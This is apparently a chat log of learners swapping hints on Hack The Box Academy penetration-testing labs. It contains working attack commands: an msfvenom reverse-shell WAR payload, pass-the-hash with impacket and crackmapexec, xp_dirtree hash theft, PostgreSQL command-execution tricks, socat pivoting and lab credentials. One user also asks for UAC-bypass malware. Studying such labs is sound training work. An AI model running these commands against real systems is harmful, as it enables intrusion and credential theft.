HINT "What is the FQDN of the host where the last octet ends with "x.x.x.203" . HINT guys i was stuck on it for hours , dont change IP given when you spawn machine , only change subdomain at the end of dnsenum , for example . dnsenum --dnsserver 10.129.???.???(your IP) --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/NEVERCHOSE-top1million-5000.txt ??????.inlanefreight.htb (ALSO DONT PUT THAT . AT THE END OF HTB DOMAIN ) biggest HINT is try DIFFERENT lists in that dir for SAME subdomain , and you will get different results
any one has solved the Attacking Common Services - Easy using || CORE FTP || method i have already solved the lab using || MYSQL|| but wanted to know the other way EDIT :- nvm solved it
Try a different list. A smaller list
yes stacked queries ie ending the initial statement with a semicolon followed by attempting to perform another query which in this case is RCE with COPY or RCE with Extensions. i have tried both ways and confirmed the table is created for the first way and the lo_create is successful for the second way. but i am unable to proceed further.
Hello,
I'm stuck on Skill Assessment of Using CrackMapExec on the second question:
Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.
What I get so far:
- Two valid users with their credentials
- Dump the SMB, and I got another creds but didn't work...
Any hint?
Hello, im in ATTACKING COMMON SERVICES sql databases module and im stuck, im trying to execute subdirs but i don't have access EXEC master..xp_subdirs '\\10.10.110.17\share\' but if i use dirtree works EXEC master..xp_dirtree '\\10.10.110.17\share\' im trying to steal hashes with responder but doesnt work, what can i do?
Oh, yes then stacking sql queries is the way to go. Although you can send them individually
are you sure that this is the IP of your tun0 interface?
got it!
did you try using the copy way or through the extensions way?
One of the copy methods. 🙂
something like this? https://medium.com/r3d-buck3t/command-execution-with-postgresql-copy-command-a79aef9c2767
PostgreSQL access lead to command execution. Supported versions: v9.3–v14
I can assure you that two of the provided commands are working
it could be that might be missing a json file when you imported them
One of those methods maaaaaay work 😉
did you use this to get a shell or just read a file
But I would point you at the HTB Command Execution chapter. What you can do to test things is run each command in sequence with an IF WAIT method to get feedback whether the command worked.
Errr. No. Try looking at the example C compiling
But just be careful you're using the correct pgsql server version when compiling. I think the pwnbox has v15 on it
and you'll want v13 (as per the HTB guide)
i tried this few days back. had some issue with this portion INSERT INTO pg_largeobject . already took care of the blacklisted character but still it doesn't insert 1 page based on my validation "SELECT COUNT(DISTINCT pageno) AS num_pages FROM pg_largeobject WHERE loid = 58514"
Im trying to connect to mssql with this mssqlclient.py -p 1433 htbdbuser@10.129.246.163 but i have the next issue [*] Encryption required, switching to TLS [-] [('SSL routines', '', 'no protocols available')] looking on internet i found this post in github https://github.com/fortra/impacket/issues/856 i did what the post says, i changed ctx = SSL.Context(SSL.TLSv1_METHOD) to ctx = SSL.Context(SSL.TLSv2_METHOD) in my tds.py file 2 times in line 666 and 914 and i updated impacket but i still have the same issue, could somebody help?
it would be easier if you just download an older release
how i can downgrade my myssqlclient.py ?
im trying to uninstall impacket sudo pip uninstall impacket WARNING: The directory '/root/.cache/pip' or its parent directory is not owned or is not writable by the current user. The cache has been disabled. Check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag. Found existing installation: impacket 0.9.22 Not uninstalling impacket at /usr/lib/python3/dist-packages, outside environment /usr Can't uninstall 'impacket'. No files were found to uninstall. first it tells me that i have version 0.9.22 then it can't uninstall it
if i run mssqlclient it says that i have version 0.10
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
you don't need to install it
just visit the examples directory and you will see the scripts
i dont understand i downloaded impacket-0.9.15.tar.gz how can i run the mssqlclient of this version ?
it is an archive that contains different files and directories
i dont know how to do it sorry
i do it and now how i run the mssqlclient version of impacket 9.15?
why is runing version 10 of impacket?
Hello! Is the lab in the 'sudo' section for the updated 'Linux Privilege Escalation' module mistaken? The lab doesn't match any of the techniques they taught you in this section
hello, working on the hacking wordpress module, being asked to manually enumerate the folders. i did that. directory listing is enabled, but not able to find flag.txt file. in the 2 folders as mentioned in the content material
if the content material tells u the folders it will be too easy
ok!
sorry didnt get you. you mean i have to use some other tools to enumerate?
all you need is the content but you have to think out of the box
I'm doing the final module in the CPTS course - ATTACKING ENTERPRISE NETWORKS. I'm trying to do this module without looking at the answers, I keep running commands I feel should work, but they don't. I look at the walkthru and don't know why what I'm doing wouldn't work but the way they did it does. Is there anyone that can provide an in-depth explanation for a couple examples I have??
can you give me a small hint, been at this for some time now. i have no idea what to do next
I have
Hi I have this credentials on my question ||JMarston:P@ssword!|| but I can’t submit ! -format is (username:password case - sensitive)
which section and module
Password Attack - Attacking AD & NTDS.dit
put the password in single quotes
Doesn’t work
Done , thanks I just copied Pwn3d! credentials from crackmapexec
thank you, can't manage this without your guidance
Got it yet?
Hi everyone, I'm currently in the password attacks module, in the mutation section. I'd like to know if I'll have to wait a long time to obtain the ssh password by bruteforcing it?
Hi how are ya I'm going through the linux fundamentals module and got stuck on this assignment where I need to ssh through vpn and say what's the path to the user's mail. Not only did I not find anything online I also don't understand what finding the "path" to the mail means. Any help?
yeah, finally found it. wpscan was helpful
If you create a correct rule without deleting the first 17000 words, yeah, you will wait a long time
So what is the solution to speed up the process pls
Does windows attack and defense module cover ADCS completely? like including ESC4 too. From outside the module I see it mentioning only ESC1 and ESC8
Hey guys, I'm trying to crack a hash file using john, when I specify a wordlist to be used, the john tool runs and ends in a few seconds without actually cracking, but when the wordlist is not specified john runs fine and doesn't end soon, can anyone help me with this, thanks.
when you don't specify any wordlist, john resorts to a default one.
You can see that in the output itself.
hashcat is better
(on my opinion)
thanks, yes I do know that, the issue I want to solve is that john doesn't run when I use a wordlist that I choose
I believe it does run with your wordlist, it just doesn't show anything unless it cracks the password
cool thanks
--verbosity=N Change verbosity (1-5 or 6 for debug, default 3)
you can play around with the verbosity to debug if you want
how long is your wordlist you're trying to use? if it's small then yes, it would probably run thru it in literally no time. Try selecting a super long wordlist like rockyou since this isn't john's default wordlist and see if it quits early
No one is talking Iam leaving now.
No. The ADCS is just one section in the module but the module gives you access to the official paper released when the vulnerability was discovered and in that Yes, you have access to all types of escalation and persistence through Windows certificate service. The module is great and closes a lot of gaps regarding AD in general
Ah, Thanks for the insight. Also congrats on completing all the modules 
hi
How Can I Transfer a zip file From a Windows Machine to our linux machine ?
For Ex I want to transfer a bloodhound zip file from a windows machine using the Powershell
what accesses do you have to Windows machine is the first question.
AD Admin Local user
Well, there's a lot of techniques you can use from mounting file through RDP, SMB shares, HTTP file transfers
I'd recommend you to go through the File Transfer module, It has everything covered
Can You Give me A Command Using RDP ?
Hi Im in password attack - Credentials hunting in windows in before last question I found || P@55w0rd || to submit but I cant
Nice ! I will check this module
But Now Im stuck on Questions Required to bloodhound
Hi, I'm in The Live Engagement - module shells and payloads and i need help please. In the first host, i ||upload the war reverse shell but i don't receive the shell||
@gaunt monolith which question specifically
Too vague, can you send ss or payload you using
I have used the next payload to create the war file: ||msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IP] LPORT=[Port] -f war -o shell.war||
^
you can try unzipping the .war archive to see how exactly the payloads are stored
and see if that helps with your execution.
Hey! I was doing the first question for the pass the hash section, on password attacks, and I have a question. https://academy.hackthebox.com/module/147/section/1638
For some reason, when I try using impacket-*exec or crackmapexec it won't work, but evil-winrm does.
# doesnt work, even if i change to any other like psexec
impacket-smbexec Adminstrator@10.129.122.157 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
# also doesnt work
crackmapexec winrm 10.129.122.157 -u 'Adminstrator' -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
Anyone knows the reason?
Command that works: evil-winrm -i <ip> -u <user> -H <hash>
.\Adminstrator:30B3783CE2ABF1AF70F77D0660CF3453 STATUS_LOGON_FAILURE
Hey! I'm having trouble with question two on Privilege Escalation. https://academy.hackthebox.com/module/77/section/844 I have access to user2, but unsure how to progress.
Got it! 🙂
Before last >> whats default password use when make new account in domain controller
dm me what u were gonna submit
Has anyone had issues with 'Cracking Wireless (WPA/WPA2) Handshakes with Hashcat'?
Following the instructions and still getting this result:
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: WPA-PBKDF2-PMKID+EAPOL
hello all
i want some help with bloodhound
when running it in the module active directory enumeration and attacks
i do the USING WEB PROXIES module and try to setup ZAP.
The HUD doesn't work. It doesn't show. I use the open browser with pre-configuration, and HUD is enabled but it doesn't show. Why?
module: active directory enumeration and attacks section : Privileged Access
what error do you get when running it
when running cipher on bloodhound it shows no data
cypher queries?
yes
first i run bloodhound ./bloodhound.exe
then i paste the cipher
MATCH p1=shortestPath((u1:User)-[r1:MemberOf1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote1..]->(c:Computer) RETURN p2
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
there's a small syntax error in what you had sent
or maybe not, discord just processed the * to italics in what you sent but. The query works for me
i have this and is saying it is not the right answer
"submit the first word of it as the answer"
more like, submit the word that's actually an word
For good reasons lol
but yeah, just submit what looks actually like a word
done ty
can I get a hand with https://academy.hackthebox.com/module/116/section/1512 Attacking DNS - I don't know what to do to fix the transfer failed running dig
what's the issue?
I think it's mostly my understanding, I haven't managed to get the AXFR zone transfer to work with the subdomains I got from subbrute
Maybe you haven't gotten the right subdomain yet.
subbrute is the way, tho so maybe wait till you get enough
I've found 4
you can send me the list in DM.
Has anyone completed the newly added Logrotate section in the Linux Privesc module? I’ve compiled the binary and it seems to run properly. I checked the options in logrotate.conf and adjusted the payload accordingly. One of the conditions for the exploit to work is that we need write permissions on the log files, but we only have read on /var/log, not sure how to proceed.
Hello every body, please someone know where i can have tutorial tò make an UAC bypass malware?
why is the revshell not working?
you don't need a reverse shell
yup definitely got it.
Hi guys, for those of you doing 'using web proxy', when you open the proxychain, is it like /etc/proxychains.conf or /etc/proxychains4.conf?
HTB Academy has everything you need
where can I find it ?
Just search HTB Academy on Google and it should be the first one
ok thanks
Np
Finally !!
who is there
what happened ?
Yeah its good ! Specially the assessment labs
anyone already had that problem?
curl ip
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
curl: (7) Couldn't connect to server
how is that command going through proxychains tho, you aren't even mentioning proxychains
Also, you gotta mention the protocol, http:// for curl
proxychains curl http://IP
and wdym with that
create a port forward if it is not working
what did you do for port-forwarding?
https://academy.hackthebox.com/module/136/section/1288 File Upload Attacks
any hint please
am able to upload files but not to execute them
nvm i got it
i had to find the extension which is able to execute
no
I am struggling to connect to the database to start the questions for "Attacking SQL databases, Attacking Common Services". Not sure what I am missing here.
I am just confused with how to connect to the target initially
not sure how to authenticate with that user
Probably enumerate and see what port opens first
1433 is open but mssqlclient.py is throwing errors at me
mssqlclient looks to be broken, that may be my issue
can you share the command that you are using?
dm you
ftp> ls -a
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 root root 4096 Nov 10 2021 .
drwxr-xr-x 2 root root 4096 Nov 10 2021 ..
226 Transfer complete
hello i am doing footprint module easy lab section. but i am not sure how to proceed
can somebody help me please?
Where are you stuck and what have you tried?
i connected to ftp
ftp> ls -a
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 root root 4096 Nov 10 2021 .
drwxr-xr-x 2 root root 4096 Nov 10 2021 ..
226 Transfer complete
What port # is that?
6748
I just did an nmap scan on footprinting easy, I don't see 6748 open
Dm me a screenshot of you nmap scan if you want
I don't think it's the /var/log file, it doesn't necessarily need to be that file. The file where logrotate modifies/creates can be in a different place too.
Were you able to get it working? All my searches pointed me to /var/log
Yup
It's sitting right inside your home folder
Ok, I'll double check, ty
hello for the hacking wordpress module, username enumeration room, i copied the curl post command from burp, burp is displaying the correct output, but curl command in terminal is displaying only the headers . how do i get curl to show the html body as well?
curl -i -s -k -X $'POST' , these are the flags being used
I haven't been able to get a shell to be spawned yet tho.
Me neither, that's where I'm stuck as well
I saw that there are no changes to the bash_completion.d directory even when the exploit gets executed
gotta be some small detail we might be missing.
haha
😎
Find a directory that is writable by your user and use file transfer methods in that particular directory.
you should be able to do so with a basic Invoke-WebRequest, refer to file transfer module for more techniques
You always gotta host the files in your local VM because most of the time (almost all from what I've seen) the labs don't have internet access, so you can't download Internet-available resources to the boxes
I believe it's got to do with the Web-Shell restriction? Was your access a web-shell?
Sometimes WebShell don't do a good job of navigating around, I'd say get a reverse shell whenever possible.
in the hacking wordpress module, skill assessment, i put in inlane.htb in the /etc/hosts file, but that would not work we need to put in inlane.somethingelse in the /etc/hosts file, now why did inlane.htb not work , why am i forced to put inlane.l**** in the /etc/hosts file ?
I'd not agree to that, they both work different lol
Ah if you mean it like that, yes. Mostly yes you can 🙂
To be more detailed, some advanced webshell allows you to move around which makes you think you're navigating like in a reverse shell but they just process your inputs on client side and append the path automatically to the payload, to seem like you're navigating to places.
Q / Run Snaffler and hunt for a readable web config file. What is the name of the user in the connection string within the file?
I get the name but I can't solve the Question
which module is this?
ACTIVE DIRECTORY ENUMERATION & ATTACKS -> Credentialed Enumeration - from Windows
I found the answer
Ty
Ah cool.
Using rockyou-50.txt as password wordlist and htbuser as the username, find the policy and filter out strings that don't respect it. What is the valid password for the htbuser account?
Im stuck in this module: broken authentication. someone could help me?
Hi, in this module "DNS Tunneling with Dnscat2" how can I transfer dnscat2-powershell.git to the victim machine?
You can use a python simple server
Thanks❤️
Anyway I recommend you to do the "File Transfer" module
Anything I can do to fix this? (sudo apt install libc6 doesn't work)
Is in the pivoting - SOCKS5 tunneling with chisel section
So I’m considering to get the yearly subscription in hackthebox academy
When I get this , do I have direct access to all the modules ?
Everything up to tier 2 I think
Yea does that mean I don’t have access after that ?
English is not my native language I’m confused lol
you can use the cubes you earn to buy those modules
Yea buttt I don’t think the cubes are enough lol
I’m at work staring at this subscription instead of working 
@dapper star gotta give it to you , I love your bio lmao
Hahaah thanks 🙂
there is a compiled version on github in case you want to skip the compilation part
Can't find it, do you have a link? Is it in the normal github repo?
❤️ thanks
I am doing the network enumeration with nmap module but in the firewall bypass practice if I do it from my machine it doesn't work but from the pwnbox it does. Why is this happening?
It's prolly with how packets sent and received, usually firewall audits would be performed inside internal networks, Not through VPN. I guess, it's the same case here.
I am on shell and payloads module.
I am stuck at 50064.rb the exploit is given error.Error is method ' split ' for nil:nilclass
are you using it with msf ?
Yes
Do what exactly? What record are you requesting specifically?
@sly kelp ?
@rustic sage Can you verify yourself and send screenshot of what options you're setting to execute the payload?
I am trying to understand that is it because of exploit or did you miss something during importing the exploit to msf directories.
This command only brute-forces the subdomains.
@sly kelp during exploit
Look on the module to see what record you got to request to get IPv4 Addresses for each of the subdomains
can you send the screenshot and we can try to figure out
damn skill assessment payloads and shells challenging me hard
Stuck at attacking dns (attacking common service module). I can't enumerate dns
No doubt about it
where are you at in %
15/17
damn thats like 80-87 %
I get connection error during second machine rdp
did you finish the CBBH pathway ?
Nah im on my cpts currently at 26%
Which path is that? That requires 17 modules? 
naah CBBH requires 20 i guess
and CPTS has 28
?
I am 93% on CBBH and 65% on CPTS
Can I dm you about this?
there are 17 sections and I have done 15 of them
I'm having issues with getting a RDP connection to the Target machine in Password Attacks - PtT (Windows). I'm using the following command: xfreerdp /v:10.129.142.67 /u:Administrator /p:'AnotherC0mpl3xP4$$'
Any advice? It worked once. I don't know if the connection to the machine is just terrible.
are you using xfreerdp or remmina?
xfreerdp
try to use another tool mostly for me xfreerdp never worked with stability
Good idea. Thanks.
Upload File Attacks, what wordlist did u use here to bypass Only Image Allowed?
from client side ?
what did you try to solve this ?
me?
Yes for footprinting lab
i did nmap
and saw the services that i think that they are accessible
and i tried couple of things but yet still didnt figure it out
You have some services and you have a username. Now you can try something
there is a list of usernames and password in resources tab
try to disable your adblocker
check your dm i sent you the file
whats the point downloading it at my host?
You can just make a file in pwnbox and copy the contents there
thanks
File Upload Attacks - Whitelist filters any hint please
anyone having issues connecting to RDP?
Can I DM you please? Got a question about a problem you had (and can prob help you with this)
yea
please give me a hint with sam's password on Password Mutations question? I am running HYDRA against FTP with mut_password made using the custom.rule and i am at attempt 10947 of 94044 ? please thanks
Hi why cant login on ssh with user kira password ||l0vey0u1|| ? In pass attacks credentials Hunting in linux
Because it is wrong
I get "uploaded successfully", but I get error 404
when I go to the uploaded file
hi, still stuck?
After mutating the password using the custom rule? Also, Hydra gave it to me
Hydra didn't give that password
because it is wrong
I’ll try another
careful with false-positives
and start simple, don't overcomplicate without need; for example, try to use PHP echo or similar
this will help you understand if PHP code is being executed
Is there any other tool to fuzz it
apart from Burp Suite?
Burp is the way, to be fair
but know that not always the first result is the answer
nor the second
ffuf
I was proxying ffuf through Burp when I was on that module.
Helps you see a lot.
I have tried 10+ different "false positives"
I found one
Yeah, it was simpler than what I was trying lol, thanks
Module attacking common services, I’m at attacking email services question 2, but for some reason I can’t seem to get the password for the m account
“Access the email account using the user credentials that you discovered and submit the flag in the email as your answer.”
I tried hydra with the pws list in resources and with the one found earlier
What is not working?
I used the password list
What username are you using?
Marlin
The one from resources?
@acoustic owl IDK how to use the wordlist
You're trying to brute-force a MAIL server?
What wordlist, and what exactly do you want to do?
Well, trying to brute-force SMTP, yes
I tried IMAP and POP3 as well, yeah, no dice
-.-
When you log in to Gmail,
do you use 0x56 or 0x56@gmail.com?
Hello everyone, I am doing the academy and in many cases I am getting numerous timeout responses for the exercises in Metasploit. When I test with nmap and set the flag to 1m it works, but even calling the advanced options of the exploit and setting a longer time in ms, I am still getting timeout responses. Can you help me please?
Jfc, I'm an idiot lol 😂
Well, you can do it with 0x56 now because it autocompletes the gmail.com, but you get the point, I think
connect to the vpn
I need some help with Socat Redirection with a Bind Shell (PIVOTING, TUNNELING, AND PORT FORWARDING )
I have done this many times
I can't understand how the bind shell is active
yes
ping -c 1 IP
what do you mean
IDK how socat directly connects to the Windows machine
Think of socat as a portal gun. The socat command they tell you to run on the victim machine will take any traffic to port 8080 and redirect it to 172.16.5.19:8443, where 172.16.5.19 is another Windows machine
any full command?
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
copied and pasted straight from the lesson lmao
The socat command is not actually creating the bind shell, but it's connecting you to the bind shell
IK, but I need to set up 2 SSH sessions?
You could always run this command and then background it with the &
otherwise yeah, 2 ssh sessions
step by step?
- Creating the Windows Payload
- Configuring & Starting the Bind multi/handler to connect to the Victim Server
- Starting Socat Bind Shell Listener
or tmux it
do I need to use something from last section?
Nice bro, that's huge
I'm not going to tell you it step by step because that's what the job of academy is supposed to be, but this is the sequence of events
Attacker --> Victim --> Internal Subnet
- A bind shell listens on the internal subnet, waiting for a connection
- You run socat on the victim to take any traffic to victim:8080 and send that to internal:8443
- You point your Meterpreter bind thing to the victim machine, because socat will handle the back and forth
thanks a lot, I will try it first
still confused
How do you have access to windows host?
Yes, that's the question I want to ask. From my understanding, the bind shell receives the signal, and the Windows server has already set up half of the bind shell; I only need to connect to Windows using the victim server, and it doesn't work. IDK what I missed
...IDK how you get the Windows server's signal back to the victim server
I think it's SMB, right?